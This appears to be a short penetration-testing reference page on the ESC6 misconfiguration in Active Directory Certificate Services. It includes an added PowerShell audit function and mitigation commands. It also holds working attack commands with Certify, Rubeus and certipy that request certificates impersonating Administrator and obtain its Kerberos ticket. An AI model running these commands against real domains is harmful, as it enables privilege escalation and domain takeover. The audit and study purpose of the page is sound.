ESC6

Note: ESC6 was patched in May 2022.

ESC6 permits the inclusion of user-defined values in the subject alternative name for any request. On Windows we can verify the permission:

PS /home/bobbuilder> certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags"
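For auditing, the check above can be scripted. The following is an added example, not part of the original page: it parses the `certutil -getreg` output and tests the `EDITF_ATTRIBUTESUBJECTALTNAME2` bit (0x00040000), the CA flag that allows a requester-supplied SAN. The function name `Test-Esc6EditFlags` is hypothetical and the sample output is constructed.

```powershell
function Test-Esc6EditFlags {   # hypothetical helper name, added example
    param([Parameter(Mandatory)][string]$CertutilOutput)

    # CA policy flag that lets any request carry its own subject alternative name
    $EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000

    # certutil prints the DWORD in hex first: "EditFlags REG_DWORD = 15014e (1376590)"
    $m = [regex]::Match($CertutilOutput, 'EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)')
    if (-not $m.Success) {
        throw 'No EditFlags REG_DWORD value found; check the -config string and CA access.'
    }

    $flags = [Convert]::ToInt64($m.Groups[1].Value, 16)
    [pscustomobject]@{
        EditFlagsHex            = '0x{0:X8}' -f $flags
        SanFromRequestAttribute = ($flags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) -ne 0
    }
}

# Constructed sample output (EXAMPLE-CA is a placeholder), not captured from a real CA.
$sample = @'
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\EXAMPLE-CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy\EditFlags:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_DISABLEEXTENSIONLIST -- 4
    EDITF_ADDOLDKEYUSAGE -- 8
    EDITF_BASICCONSTRAINTSCRITICAL -- 40 (64)
    EDITF_ENABLEAKIKEYID -- 100 (256)
    EDITF_ENABLEDEFAULTSMIME -- 10000 (65536)
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
    EDITF_ENABLECHASECLIENTDC -- 100000 (1048576)
CertUtil: -getreg command completed successfully.
'@

$result = Test-Esc6EditFlags -CertutilOutput $sample
$result

if ($result.SanFromRequestAttribute) {
    # Mitigation, run on the CA host, followed by a restart of the CA service:
    #   certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
    #   Restart-Service certsvc
    Write-Warning 'EDITF_ATTRIBUTESUBJECTALTNAME2 is set: the CA accepts requester-supplied SANs.'
}

# Against a live CA, feed the real output instead of the sample:
#   Test-Esc6EditFlags -CertutilOutput (certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags" | Out-String)
```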

Windows

Request a certificate abusing ESC6

PS /home/bobbuilder> .\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:Administrator

Convert certificate to PFX

Get a TGT as the Administrator Account

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx

Linux

Certificate Request with an alternative UPN

bob$ certipy req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -template <template_name> -upn administrator@minions.com